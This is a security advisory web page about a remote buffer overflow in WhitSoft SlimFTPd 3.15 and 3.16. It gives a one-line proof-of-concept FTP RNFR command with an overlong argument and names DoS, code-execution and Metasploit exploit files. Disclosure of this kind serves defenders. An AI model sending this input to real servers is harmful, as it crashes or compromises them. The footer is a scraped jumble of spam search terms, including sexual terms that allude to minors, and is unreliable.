about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , WhitSoft Development SlimFTPd Multiple Commands Remote Buffer Overflow Vulnerability


Title WhitSoft Development SlimFTPd Multiple Commands Remote Buffer Overflow Vulnerability
Published 2005-07-21-12:00AM
Updated 2005-08-14-07:17PM
Class Boundary Condition Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  Discovery is credited to Raphael Rigo <ml-bugtraq@twilight-hall.net>.
Vulnerable  WhitSoft SlimFTPd 3.16
WhitSoft SlimFTPd 3.15
Not Vulnerable  WhitSoft SlimFTPd 3.17
Code   A proof of concept example is available:

ftp> quote RNFR 123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345678901234567890123456789012345678901234
5678901234567890123456789012345

A proof of concept denial of service exploit (47slimftpd_bof.pl) was provided by Dim K0r0l <dim@acolytez.com>.

A proof of concept remote code execution exploit (redslim-slimftpd.c) was provided by redsand <redsand@redsand.net>:

The slimftpd_list_concat.pm exploit is available for Metasploit. /data/vulnerabilities/exploits/47slimftpd_bof.pl /data/vulnerabilities/exploits/redslim-slimftpd.c /data/vulnerabilities/exploits/slimftpd_list_concat.pm
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 19 Dec 2009 07:26:30 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.ixiaot Tagger LE. mambo Remo Www sex ca FoolProof tagged.com cep18.com pinkworld sixse schoolgirl Indasex www.mytele WWW.SEXGiR Gold Vidoe full Crack+Data php-nuke 2 Girls fuck news for C Girls fuck news for C WWW.SEXNEM Reshma sex www.shjind lolita por ??? ??? ?? /administr old fat se Crack Data www.shjind Namitha ph news for c Indian sex /search/ex mambo Remo Madurisex 200 /compo Www.xesopu www.bhtbw. www.3p& Aksharaya maxcpm.inf phpmybb xpl/exploi Www.deseba Chetcpassw teacher an 5115 www.Hotsex dmoz.im